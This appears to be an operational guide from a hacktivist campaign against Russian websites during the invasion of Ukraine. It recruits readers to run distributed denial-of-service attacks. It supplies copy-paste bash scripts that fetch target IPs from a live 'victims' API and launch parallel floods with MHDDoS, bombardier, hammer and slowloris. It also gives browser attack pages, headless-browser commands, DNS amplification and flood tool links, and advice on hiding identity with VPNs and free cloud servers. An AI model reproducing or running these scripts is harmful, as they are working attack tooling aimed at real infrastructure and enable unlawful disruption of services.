Google Drive
Gist
Clipboard
Russia has invaded Ukraine and commited various war crimes. Russian media denies any of its attacks on civilian as well as denies any Russian troops casualties. According to them, they are doing this "special operation" to protect Ukrainians from… Ukraine.
Mykhailo Federov (Vice Prime Minister and Minister of Digital Transformation of Ukraine) has shared this twitter post encouraging cyber attack on certain targets via Telegram group. This will be the primary source of the target websites for this application.
Some foreign media and even countries (e.g. Belarus) publicly support Russian aggression towards Ukraine.
More info at https://war.ukraine.ua/
BEWARE, It's a cyberwar, but DDoS is considered illegal in almost every country.
Also, you will risk having your internet blocked by your provider or having your contract cancelled.
I don`t support aggression over peaceful entities, but we are in war, we are defending ourselves, and helping the assaulted to defend from its agressor, in that case, I dont see any ethical or moral violation in DDoSing the agressor
This document is in constant update. You may find new and updated content as you visit this document again.
Your mission here is simple, you will DDoS on strategic Russian websites/endpoints in order to take them down or significantly distrupt their services.
By now you have two different methods, first is using one of the URLs below. The other option is by using a DDoS script on Ubuntu Linux.
You may want to use a VPN service to hide your identity before doing it, I recommend using Hola VPN on Opera Browser
I also recommend changing your DNS server to 9.9.9.9 and using DNS over HTTPS, and also use randomized MAC Addresses
If you're ok with Linux, ideally you may want to boot a Tails Linux OS Instead, this is the safest option.
You can use any of the following website below, just leave it opened in your browser as long as possible:
https://fuckyourussianwarship.netlify.app
Also check:
https://github.com/Arriven/db1000n
Cossacks, we present you a new weapon!
Our own program - Death by 1000 needles (DB1000N)
This is software for coordinated DDoS attacks on the occupier's infrastructure. The main advantage of this method is that users only need to run the program on a PC to carry out attacks, and all coordination will be carried out and configured by administrators with the support of cybersecurity specialists.
Instructions for use and all necessary links are in this document
Please join everyone and download the program to your PC before the evening attacks, because then we will carry out the first attack with DB1000N. Stay tuned for the channel and upcoming updates.
Other options:
https://stop-russian-desinformation.near.page/
https://the-list.ams3.cdn.digitaloceanspaces.com/index.html
https://russianwarshipgofuckyourself.club/
https://norussian.tk/
https://stopwarnow.github.io/
https://ipfs.io/ipfs/QmYKMHHNfdxfhDtXujimFaG83ZkgkTo61p8jZ6Dww9kJaN?filename=index.html
IPFS is a distributed uncensorable file system, please upload the html/js DDoS tools to IPFS nodes to avoid censorship, and let me know to update the document with the IPFS link.
Disabling CORS is necessary to be able to get the most performance out of those pages.
See how here.
Or you can simply use a browser extension
If you want to attack a single target you can use: https://freestresser.to/
You can verify some Russian servers' status at https://rustatus.xyz/status, https://ddosmonitor.pp.ua/ and http://ru-stats.eastasia.cloudapp.azure.com/status
If you need to verify an individual site, use https://downforeveryoneorjustme.com/gazprom.ru
You can monitor the attack progress by pressing F12 (open dev tools) and navigating to the Network tab.
You can use a headless browser on the command line with those websites like Firefox.
With a headless browser you can attack using https://shell.cloud.google.com
You can enable WSL to use a Linux Shell on your Windows system
With WSL you can run all the scripts below in this article
Firefox Windows:
firefox --headless --private-window https://norussian.tk/
Chrome Windows:
"[CHROME PATH HERE]/chrome.exe" --disable-web-security https://norussian.tk/
Chrome Mac:
open -na Google\ Chrome --args --user-data-dir=/tmp/temporary-chrome-profile-dir --disable-web-security --disable-site-isolation-trial https://norussian.tk/
Please sign
Send SMS message to Russian people, help fight Russian propaganda
https://1920.in/
You can also write messages in Russian maps locations using this tool
https://github.com/jamesdh/kompromat
If you're a more advanced user, you can run a shell script on a Ubuntu Linux system to DDoS the websites.
This is a script that I have made to run multiple parallel DDoS attacks.
There is this tool, very nice indeed: https://github.com/seedpockets/ukrainian-warship
The API currently have more than 3000 targets, the script will random select 100 of the total.
We will improve the API to give precedence to priority targets and classify the targets, like military, business, the state, banks, crypto exchanges and etc…
Please use a VPN before using the script, ask on Telegram groups, there is a lot of NordVPN account they are sharing, also check free options in this document below.
You can also utilize this script on your Android device with Termux.
https://github.com/TermuxHackz/Hammer
Please check this awesome endeavour: https://github.com/prividcasper/RvK01RMD
Note that those tools were made for single URLs only, so using them on multiple URLs with this script may be hardware intensive.
To run the script, just copy and paste this on your terminal, and you're done. Leave it as long as possible:
If you dont want to run it on your computer you can use https://shell.cloud.google.com.
Or you can use the free VPSs listed in the footer of the document.
DDoS Attack Script With 40 Methods
#!/usr/bin/env bash
sudo apt update
sudo apt upgrade
sudo apt install jq
sudo apt install git
sudo apt install python
sudo apt install python
sudo apt install python3-pip
git clone https://github.com/MHProDev/MHDDoS.git
cd MHDDoS
pip3 install -r requirements.txt
targets_api="http://164.92.247.88:9300/victims"
curl -s $targets_api | jq -r .statuses[].ip | sort --random-sort | head -n 100 > targets.txt
for target in $(cat targets.txt); do
python3 start.py bypass "$target" 5 1000 socks5.txt 100 999999 &
done
Bombardier is a HTTP(S) benchmarking tool. It is written in Go programming language and uses excellent fasthttp instead of Go's default http library, because of its lightning fast performance.
#!/usr/bin/env bash
sudo apt update
sudo apt upgrade
sudo apt install jq
wget https://github.com/codesenberg/bombardier/releases/download/v1.2.5/bombardier-linux-amd6
chmod 770 bombardier-linux-amd64
chmod +x bombardier-linux-amd64
targets_api="http://164.92.247.88:9300/victims"
curl -s $targets_api | jq -r .statuses[].ip | sort --random-sort | head -n 100 > targets.txt
for target in $(cat targets.txt); do
sudo ./bombardier-linux-amd64 -c 200 -d 99999999999s -l "$target" &
done
Upgraded version:
#!/usr/bin/env bash
# settings
NUM_TARGETS=20
WORKERS=100
TARGETS_REFRESH=300
INSTALL_PATH="$HOME/cyberdefence-ua-ops"
BOMBARDIER_EXE="./bombardier-linux-amd64"
## make sure software is updated and dependencies are installed
sudo apt update
sudo apt upgrade
sudo apt install jq
sudo apt install curl
sudo apt install wget
## ensure we have Bombardier
# make sure path exists
mkdir -p "$INSTALL_PATH"
cd "$INSTALL_PATH"
# if exe is not there, then fetch it
if [[ ! -x "$BOMBARDIER_EXE" ]]; then
wget https://github.com/codesenberg/bombardier/releases/download/v1.2.5/bombardier-linux-amd64
chmod +x bombardier-linux-amd64
fi
# "Curated" API for targets
targets_api="http://164.92.247.88:9300/victims"
# loop forever until ^C interrupt
while :
do
# Get list of IPs from API, filter duplicates, random sort, and choose designated number
curl -s $targets_api | \
jq -r .statuses[].ips[] | \
sort --unique | \
sort --random-sort | \
head -n "$NUM_TARGETS" \
> targets.txt
# Loop through target IP list, start subprocess for each one
for target in $(cat targets.txt); do
#echo "$target"
echo "$BOMBARDIER_EXE" -c "$WORKERS" -d "$TARGETS_REFRESH""s" -l "$target"
"$BOMBARDIER_EXE" -c "$WORKERS" -d "$TARGETS_REFRESH""s" -l "$target" &
done
# ideally all target processes should be done after this, but we'll make sure
sleep "$TARGETS_REFRESH"
killall "$BOMBARDIER_EXE"
done
DoS tools written in Python
#!/usr/bin/env bash
sudo apt update
sudo apt upgrade
sudo apt install python
sudo apt install git
sudo apt install syslinux-utils
sudo apt install jq
git clone https://github.com/cyweb/hammer
cd hammer
targets_api="http://164.92.247.88:9300/victims"
curl -s $targets_api | jq -r .statuses[].ip | sort --random-sort | head -n 2 > targets.txt
for target in $(cat targets.txt); do
target=$(echo $target | sed 's/https\?:\/\///') &&
target=${target%/} &&
target=$(gethostip "$target" | awk '{print $2}') &&
python3 hammer.py -s "$target" &
done
Send authorized HTTP traffic to the server.
As it makes the attack at a slow rate, traffic can be easily detected as abnormal and can be blocked.
#!/usr/bin/env bash
sudo apt update
sudo apt upgrade
sudo apt install python
sudo apt install git
sudo apt install jq
git clone https://github.com/gkbrk/slowloris.git
cd slowloris
targets_api="http://164.92.247.88:9300/victims"
curl -s $targets_api | jq -r .statuses[].ip | sort --random-sort | head -n 100 > targets.txt
for target in $(cat targets.txt); do
python3 slowloris.py "$target" &
done
You need Python, Git, and JQ installed.
If you wanna user another tool, tune accordingly.
git clone https://github.com/cyweb/hammer
cd hammer
targets_api="http://164.92.247.88:9300/victims"
curl -s $targets_api | jq -r .statuses[].ip | sort --random-sort | head -n 100 > targets.txt
for target in $(cat targets.txt); do
target=$(echo $target | sed 's/https\?:\/\///') &&
target=${target%/} &&
host=$(echo $target | cut -d'/' -f3) &&
target2=$(host "$host" | head -1 | awk '{print $4}') &&
python3 hammer.py -s "$target2" &
done
If you're a developer, We have created APIs with the current targets.
You can help me improving this document, but you will need to create an account on hackmd.io and text me on Telegram with the email you used in order to have edit access to this document.
You can fetch the data using the targets list and the target object name. On the command line, you will need curl and jq.
curl -s https://api.npoint.io/7244571a09d1f5274a45 | jq -r .targets[].target
curl -s http://164.92.247.88:9300/victims | jq -r .statuses[].url
Processed, ranked and classified:
https://reqbin.com/jeqixot4
Raw data:
https://reqbin.com/hot28zo2
Another source:
https://itarmy.pp.ua/api/?type=online
https://aws.amazon.com/pt/free/
https://www.oracle.com/cloud/free/
https://baehost.com/en-int/vps-argentina/vps-gratis
ClearVPN
Register on https://my.clearvpn.com/
Select a Redeem a promocode button
Enter promocode SAVEUKRAINE
Login to your account.
Press the "Change your location" button and change it to Russia (prefer) or another country.
Please, do not select Ukraine on the VPN. Citizens in Ukraine must be able to access the Internet
https://protonvpn.com/
https://www.f-secure.com/
https://www.urban-vpn.com/
https://atlasvpn.com/vpn-for-windows
This is one is hot:
https://github.com/seedpockets/ukrainian-warship
https://github.com/ajax-lives/NoRussian - HTML ajax ddos
https://github.com/smok-serwis/siege-engine - take a look
https://github.com/1N3/Sn1per - useful to do main recon
https://github.com/thesc1entist/j0lt - dns amplification tool
https://github.com/OffensivePython/Saddam - dns amplification tool
https://github.com/0xc0d/Slow-Loris - Slow DDos to exhaust connection
https://github.com/XCHADXFAQ77X/SLOWLORIS - another way
https://github.com/gkbrk/slowloris.git - another slowloris repo
https://github.com/cyweb/hammer - tool that I have used
https://github.com/TermuxHackz/Hammer - same tools for Termux on android.
https://github.com/Avielyo10/DNS-Amplification-Lab - other kinds of attack
https://www.yougetsignal.com/tools/web-sites-on-web-server/ https://www.ip-address.org/reverse-lookup/reverse-ip.php - find other websites hosted on the same server.
https://github.com/LimerBoy/Impulse
https://github.com/maxng07/dns-flood
https://github.com/MHProDev/MHDDoS - Best DDoS Attack Script Python3, Cyber Attack With 40 Methods
https://sourceforge.net/projects/loic/ - Famous LOIC
UDP, TCP, and HTTP requests to the server
Test the performance of the network.
Loic does not hide an IP address.
Perform stress testing.
HIVEMIND mode will allow you to control remote LOIC systems. With the help of this, you can control other computers in a zombie network.
https://sourceforge.net/projects/highorbitioncannon/ - infamous hoic
Attack up to 256 websites at once.
counter to measure the output.
ported over to Linux or Mac OS.
Let's shut down more news YouTube channels that openly lie about the war in Ukraine.
YouTube channels:
First channel: https://www.youtube.com/channel/UCX9-cJy8dZWDI8hCnmahuLA
Russia 24: https://www.youtube.com/c/Russia24TV
TASS: https://www.youtube.com/c/TASSagency
RIA Novosti: https://www.youtube.com/user/rianovosti
https://www.youtube.com/channel/UC8Nl7TQLC6eX8MTRCuAw3SA
https://www.youtube.com/channel/UCGRcod_jR4sC9XUMLCv4GJQ
https://www.youtube.com/channel/UCSqO8lV-ric7ow5G5q9roWw
https://www.youtube.com/channel/UCdyhZX5wt6B6dSIAT7X9dNw
https://www.youtube.com/channel/UCRHhScZmH-SfBin8tbTixPA
https://www.youtube.com/channel/UC3rZ3DKoeiccjl-e-lams_g
https://www.youtube.com/channel/UCJvDYmmZDbeDy5N_aBxXjpA
https://www.youtube.com/channel/UCMTaJV_Gyp1YOWJwSNa0wRw
https://www.youtube.com/channel/UC8lCS8Ubv3t0-Tf4IYLioTA
YouTube-blogers:
ZIMA LIVE: https://www.youtube.com/c/ZimaLive
Соловьёв LIVE: https://www.youtube.com/channel/UCQ4YOFsXjG9eXWZ6uLj2t2A
How to report channels:
⁃ Turn on your laptop or desktop computer.
⁃ Turn on VPN as most channels are not available in Ukraine.
⁃ Sign in to your YouTube account.
⁃ Open the desired channel.
⁃ Go to the About tab.
⁃ Find the flag image and click on it.
⁃ Select the appropriate violation description from the drop-down menu.
https://hackertarget.com/sqlmap-tutorial/
https://www.binarytides.com/sqlmap-hacking-tutorial/
https://github.com/erkexzcx/stoppropaganda
https://www.reddit.com/r/hacking/comments/t1a8is/simple_html_dos_script_for_russian_sites/
https://www.russianwarchatter.info/ - Known Russian Military Frequencies
If you want to become an expert and I.T Security field you may want to start reading those curated awesome guides:
https://github.com/onlurking/awesome-infosec
https://github.com/rmusser01/Infosec_Reference
-
Any changes
Be notified of any changes
-
Mention me
Be notified of mention me
-
Unsubscribe
Subscribe